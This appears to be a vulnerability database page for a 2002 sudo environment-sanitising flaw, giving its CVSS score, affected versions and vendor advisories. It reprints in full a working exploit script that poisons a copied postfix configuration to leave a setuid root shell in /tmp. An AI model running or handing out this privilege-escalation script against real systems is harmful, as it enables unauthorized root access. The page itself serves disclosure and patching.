Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
sudo 1.6.0 through 1.6.3p7 does not properly clear the environment before calling the mail program, which could allow local users to gain root privileges by modifying environment variables and changing how the mail program is invoked.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.2 | AV:L/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 21227
Publication date : 2002-01-13 23h00 +00:00
Author : Charles Stevenson
EDB Verified : Yes
source: https://www.securityfocus.com/bid/3871/info
Sudo is a freely available, open source permissions management software package available for the Linux and Unix operating systems. It is maintained by Todd C. Miller.
Under some circumstances, sudo does not properly sanitize the environment it executes programs with. In the event that sudo is used to run a program such as an MTA with root privileges, this could result in a local user passing unsafe data to the program via environment variables. From these environment variables the user may be able to execute commands as root, and potentially gain elevated privileges.
#!/bin/sh
#
# root shell exploit for postfix + sudo
# tested on debian powerpc unstable
#
# by Charles 'core' Stevenson <core@bokeoa.com>
# Put your password here if you're not in the sudoers file
PASSWORD=wdnownz
echo -e "sudo exploit by core <core@bokeoa.com>\n"
echo "Setting up postfix config directory..."
/bin/cp -r /etc/postfix /tmp
echo "Adding malicious debugger command..."
echo "debugger_command = /bin/cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh">>/tmp/postfix/main.cf
echo "Setting up environment..."
export MAIL_CONFIG=/tmp/postfix
export MAIL_DEBUG=
sleep 2
echo "Trying to exploit..."
echo -e "$PASSWORD\n"|/usr/bin/sudo su -
sleep 2
echo "We should have a root shell let's check..."
ls -l /tmp/sh
echo "Cleaning up..."
rm -rf /tmp/postfix
echo "Attempting to run root shell..."
/tmp/sh
Products Mentioned
Configuraton 0
Todd_miller>>Sudo >> Version 1.6
- Todd_miller>>Sudo >> Version 1.6 (Open CPE detail)
Todd_miller>>Sudo >> Version 1.6.1
- Todd_miller>>Sudo >> Version 1.6.1 (Open CPE detail)
Todd_miller>>Sudo >> Version 1.6.2
- Todd_miller>>Sudo >> Version 1.6.2 (Open CPE detail)
Todd_miller>>Sudo >> Version 1.6.3
- Todd_miller>>Sudo >> Version 1.6.3 (Open CPE detail)
Todd_miller>>Sudo >> Version 1.6.3_p1
Todd_miller>>Sudo >> Version 1.6.3_p2
Todd_miller>>Sudo >> Version 1.6.3_p3
Todd_miller>>Sudo >> Version 1.6.3_p4
Todd_miller>>Sudo >> Version 1.6.3_p5
Todd_miller>>Sudo >> Version 1.6.3_p6
Todd_miller>>Sudo >> Version 1.6.3_p7
- Todd_miller>>Sudo >> Version 1.6.3_p7 (Open CPE detail)
References
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SN-02%3A06.asc
Tags : vendor-advisory, x_refsource_FREEBSD
Tags : vendor-advisory, x_refsource_FREEBSD
http://www.novell.com/linux/security/advisories/2002_002_sudo_txt.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://frontal2.mandriva.com/security/advisories?name=MDKSA-2002:003
Tags : vendor-advisory, x_refsource_MANDRAKE
Tags : vendor-advisory, x_refsource_MANDRAKE
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000451
Tags : vendor-advisory, x_refsource_CONECTIVA
Tags : vendor-advisory, x_refsource_CONECTIVA
